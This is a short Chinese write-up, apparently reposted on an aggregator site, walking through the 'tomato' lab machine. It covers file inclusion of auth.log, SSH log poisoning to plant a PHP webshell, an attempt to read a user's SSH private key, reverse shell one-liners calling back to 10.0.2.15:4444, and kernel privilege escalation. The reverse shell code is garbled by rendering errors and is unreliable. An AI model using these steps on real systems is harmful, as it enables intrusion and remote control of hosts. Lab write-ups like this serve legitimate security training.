tomato靶机打靶过程及思路

编程入门 行业动态 更新时间:2024-10-19 19:24:08

tomato<a href=https://www.elefans.com/category/jswz/34/1753072.html style=靶机打靶过程及思路"/>

tomato靶机打靶过程及思路

1.常规端口及服务发现

2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径

3.发现info.php提示文件包含,读取到/var/log/auth.log ,可以用ssh登录传入一句话木马,
用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息

4.使用php语句进行反弹shell连接,php -r ‘KaTeX parse error: Expected 'EOF', got '&' at position 54: …"/bin/sh" -i <&̲3 >&3 2>&3);'也失…i=“10.0.2.15”; p = 4444 ; s o c k e t ( S , P F I N E T , S O C K S T R E A M , g e t p r o t o b y n a m e ( " t c p " ) ) ; i f ( c o n n e c t ( S , s o c k a d d r i n ( p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in( p=4444;socket(S,PFI​NET,SOCKS​TREAM,getprotobyname("tcp"));if(connect(S,sockaddri​n(p,inet_aton($i)))){open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’

5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成

6.或者使用linux-exploit-suggester进行自动化枚举内核的提权漏洞,提权成功拿下shell

更多推荐

tomato靶机打靶过程及思路

本文发布于:2024-03-07 20:43:43,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1718873.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:靶机   思路   过程   tomato

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!